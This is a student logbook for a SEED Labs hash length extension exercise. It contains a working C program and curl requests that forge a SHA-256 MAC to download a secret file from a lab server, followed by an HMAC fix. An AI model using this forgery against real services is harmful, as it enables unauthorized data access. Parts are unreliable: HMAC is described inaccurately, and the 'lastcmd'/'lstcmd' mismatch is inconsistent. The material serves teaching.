# Logbook for Lab 03 Hash Length Extension Attack

## Purpose

Understand how the hash length extension attack works and exploit it on a
vulnerable webserver.

## Task 1: Send Request to List Files

We have to Download a file from a webserver using a custom get request. The
request follows the schema
`http://www.seedlab-hashlen.com/?myname=<name>&uid=<need-to-fill>&<cmd>&mac=<need-to-calculate>`,
where myname is our name (e.g. grupo7), uid is `1001` (which is the one we're
using) and the mac is calculated by concatenating the password and the request
argument (e.g. `<passwd>:myname=<name>&uid=<uid>&<cmd>`).

In order to easy the burden of copying and pasting, we created a script to
generate the request URL given the correct arguments. It's shown bellow.

```bash
#!/usr/bin/env bash

echo myname=$1
echo uid=$2
echo cmd: $3
echo key: $4

export hash=$(echo -n "$4:myname=$1&uid=$2&$3" | sha256sum | awk '{print $1}')
echo Hash: $hash

echo \'"http://www.seedlab-hashlen.com/?myname=$1&uid=$2&$3&mac=$hash"\'
```

Using this script to generate the mac, we have the following output:

```bash
[03/27/22]seed@vm:~/.../Labsetup$ ./generate_hash.sh grupo7 1001 lstcmd=1 123456
myname=grupo7
uid=1001
cmd: lstcmd=1
key: 123456
Hash: c84b1cfef48684bae95559b70a3f677ec65549ce65682cc2ebf6a658899f70ff
'http://www.seedlab-hashlen.com/?myname=grupo7&uid=1001&lstcmd=1&mac=c84b1cfef48684bae95559b70a3f677ec65549ce65682cc2ebf6a658899f70ff'
[03/27/22]seed@vm:~/.../Labsetup$ curl 'http://www.seedlab-hashlen.com/?myname=grupo7&uid=1001&lstcmd=1&mac=c84b1cfef48684bae95559b70a3f677ec65549ce65682cc2ebf6a658899f70ff'
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Length Extension Lab</title>
</head>
<body>
    <nav class="navbar fixed-top navbar-light" style="background-color: #3EA055;">
        <a class="navbar-brand" href="#" >
            SEEDLabs
        </a>
    </nav>

    <div style="padding-top: 50px; text-align: center;">
        <h2><b>Hash Length Extension Attack Lab</b></h2>
        <div style="max-width: 35%; text-align: center; margin: auto;">
            
                <b>Yes, your MAC is valid</b>
                
                    <h3>List Directory</h3>
                    <ol>
                        
                            <li>key.txt</li>
                        
                            <li>secret.txt</li>
                        
                    </ol>
                

                
            
        </div>
    </div>
</body>
</html>
```

But our task is to not only list the contents of the directory, but to download
a file from that compromised server. In order to do that, it's important to
change the commands send in the request. Let's use
`lstcmd=1&download=secret.txt` and see what happens.

```bash
[03/27/22]seed@vm:~/.../Labsetup$ ./generate_hash.sh grupo7 1001 lstcmd=1\&download=secret.txt 123456
myname=grupo7
uid=1001
cmd: lstcmd=1&download=secret.txt
key: 123456
Hash: 4ea72b588660fd0a2105ed92678d762f6a636df408856a2cf9ccf19d3f0ecc25
'http://www.seedlab-hashlen.com/?myname=grupo7&uid=1001&lstcmd=1&download=secret.txt&mac=4ea72b588660fd0a2105ed92678d762f6a636df408856a2cf9ccf19d3f0ecc25'
[03/27/22]seed@vm:~/.../Labsetup$ curl 'http://www.seedlab-hashlen.com/?myname=grupo7&uid=1001&lstcmd=1&download=secret.txt&mac=4ea72b588660fd0a2105ed92678d762f6a636df408856a2cf9ccf19d3f0ecc25'
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Length Extension Lab</title>
</head>
<body>
    <nav class="navbar fixed-top navbar-light" style="background-color: #3EA055;">
        <a class="navbar-brand" href="#" >
            SEEDLabs
        </a>
    </nav>

    <div style="padding-top: 50px; text-align: center;">
        <h2><b>Hash Length Extension Attack Lab</b></h2>
        <div style="max-width: 35%; text-align: center; margin: auto;">
            
                <b>Yes, your MAC is valid</b>
                
                    <h3>List Directory</h3>
                    <ol>
                        
                            <li>key.txt</li>
                        
                            <li>secret.txt</li>
                        
                    </ol>
                

                
                    <h3>File Content</h3>
                    
                        <p>TOP SECRET.</p>
                    
                        <p>DO NOT DISCLOSE.</p>
                    
                        <p></p>
                    
                
            
        </div>
    </div>
</body>
```

## Task 2: Create Padding
The use of padding is essential for block based hash functions because the
algorithm usually works on blocks of bits with predetermined lengths. Sha256
works with 64 byte (512 bit) blocks. So we have to pad smaller messages (M) to
make them the right size. The padding works by adding an `x80` byte after the
message's end and then padding with zeros until the end of the block. The only
thing is that the last 8 bytes are used to store the message size in bits with
a big-endian notation. We'll create a padding for the following message:
`123456:myname=grupo7&uid=1001&lstcmd=1`.

The message has 38 bytes (304 bits), so it must have that value in the length
field. The number of zero padding bytes is 64 - 38 (M size) - 1 (x80 byte) - 8
(length field) = 17. Therefore the padded message will be:

```
"123456:myname=grupo7&uid=1001&lstcmd=1"
"\x80"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x01\x30"
```

## Task 3: The Length Extension Attack
Now, we have to apply the length extension attack to exfiltrate the contents of
a file in the web server. To accomplish this, 2 things are needed, one real mac
used before and the length of the key used in this request. The next step is to
use the `length_ext.c` program to generate a new valid mac for our spoofed
message.

The original message is `myname=grupo7&uid=1001&lstcmd=1` which generates the
following hash:

```bash
[03/27/22]seed@vm:~/.../Labsetup$ echo -n '123456:myname=grupo7&uid=1001&lstcmd=1' | sha256sum 
c84b1cfef48684bae95559b70a3f677ec65549ce65682cc2ebf6a658899f70ff  -
```

Including this hash in the program with our desired message to be appended
(e.g. `&download=secret.txt`), we get the new hash. Then it's required to add
the padding and our appended string to the request:

```bash
[03/27/22]seed@vm:~/.../Labsetup$ ./lenght_ext 
f911c8aa82b8aa3509c4aa693d55a33ef0d36e99619dbd56551dfa188401fe87
[03/27/22]seed@vm:~/.../Labsetup$ curl 'http://www.seedlab-hashlen.com/?myname=grupo7&uid=1001&lstcmd=1%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%01%30&download=secret.txt&mac=f911c8aa82b8aa3509c4aa693d55a33ef0d36e99619dbd56551dfa188401fe87'
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Length Extension Lab</title>
</head>
<body>
    <nav class="navbar fixed-top navbar-light" style="background-color: #3EA055;">
        <a class="navbar-brand" href="#" >
            SEEDLabs
        </a>
    </nav>

    <div style="padding-top: 50px; text-align: center;">
        <h2><b>Hash Length Extension Attack Lab</b></h2>
        <div style="max-width: 35%; text-align: center; margin: auto;">
            
                <b>Yes, your MAC is valid</b>
                

                
                    <h3>File Content</h3>
                    
                        <p>TOP SECRET.</p>
                    
                        <p>DO NOT DISCLOSE.</p>
                    
                        <p></p>
                    
                
            
        </div>
    </div>
</body>
</html>
```

```c
/* length_ext.c */
#include <stdio.h>
#include <arpa/inet.h>
#include <openssl/sha.h>

int main(int argc, const char *argv[])
{
	int i;
	unsigned char buffer[SHA256_DIGEST_LENGTH];
	
	SHA256_CTX c;
	SHA256_Init(&c);
	
	for(i=0; i<64; i++)
		SHA256_Update(&c, "*", 1);
	
	// MAC of the original message M (padded)
	// c84b1cfef48684bae95559b70a3f677ec65549ce65682cc2ebf6a658899f70ff
	c.h[0] = htole32(0xc84b1cfe);
	c.h[1] = htole32(0xf48684ba);
	c.h[2] = htole32(0xe95559b7);
	c.h[3] = htole32(0x0a3f677e);
	c.h[4] = htole32(0xc65549ce);
	c.h[5] = htole32(0x65682cc2);
	c.h[6] = htole32(0xebf6a658);
	c.h[7] = htole32(0x899f70ff);
	
	// Append additional message
	SHA256_Update(&c, "&download=secret.txt", 20);
	SHA256_Final(buffer, &c);
	for(i = 0; i < 32; i++) {
		printf("%02x", buffer[i]);
	}
	
	printf("\n");
	
	return 0;
}
```

## Task 4: Attack Mitigation using HMAC
Now we'll fix the vulnerability by using a different function to calculate the
MAC. This HMAC function uses 2 initial keys K1 and K2 to generate the hash of
message M. The process basically calculates the hash (function h()) of M|K1 and
then appends K2 and hash it again. The final process is h(h(M|K1)|K2). Now we
can't easyly do a length extension attack because we wouldn't know the internal
state of the hash algorithm in both hash process. Using a simple hash, we did
know the internal state of the hash program after the first iteration. It was
the hash of the first block itself and we could trick it using the padding just
like in Task 3.

So we'll try to send a list command to the server using the pattched server. To
calculate the new hash, let's use the `hash.py` program provided by the lab
proposal with our strings.

```python
#!/bin/env python3

import hmac
import hashlib

key='123456'
message=':myname=grupo7&uid=1001&lastcmd=1'

mac = hmac.new(bytearray(key.encode('utf-8')), msg=message.encode('utf-8', 'surrogateescape'), digestmod=hashlib.sha256).hexdigest()

print(mac)
```

```bash
[03/27/22]seed@vm:~/.../Labsetup$ ./hash.py 
a1161bee3880ad6a6c3f809c94e4364b65154c0712e1cff2336a9616ab95e2b7
[03/27/22]seed@vm:~/.../Labsetup$ curl 'http://www.seedlab-hashlen.com/?myname=grupo7&uid=1001&lstcmd=1&mac=a1161bee3880ad6a6c3f809c94e4364b65154c0712e1cff2336a9616ab95e2b7'
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Length Extension Lab</title>
</head>
<body>
    <nav class="navbar fixed-top navbar-light" style="background-color: #3EA055;">
        <a class="navbar-brand" href="#" >
            SEEDLabs
        </a>
    </nav>

    <div style="padding-top: 50px; text-align: center;">
        <h2><b>Hash Length Extension Attack Lab</b></h2>
        <div style="max-width: 35%; text-align: center; margin: auto;">
            
                <b>Yes, your MAC is valid</b>
                
                    <h3>List Directory</h3>
                    <ol>
                        
                            <li>key.txt</li>
                        
                            <li>secret.txt</li>
                        
                    </ol>
                

                
            
        </div>
    </div>
</body>
</html>
```

Using the same command successfuly executed in task 3, we get an error with the
patched server:

```bash
[03/27/22]seed@vm:~/.../Labsetup$ curl 'http://www.seedlab-hashlen.com/?myname=grupo7&uid=1001&lstcmd=1%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%01%30&download=secret.txt&mac=f911c8aa82b8aa3509c4aa693d55a33ef0d36e99619dbd56551dfa188401fe87'
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
```

## Conclusion
In this lab, we learned how a simple MAC works, how it could be dangerous to
use a wrong (naive) approach to this function and how to mitigate
vulnerabilites with HMAC.
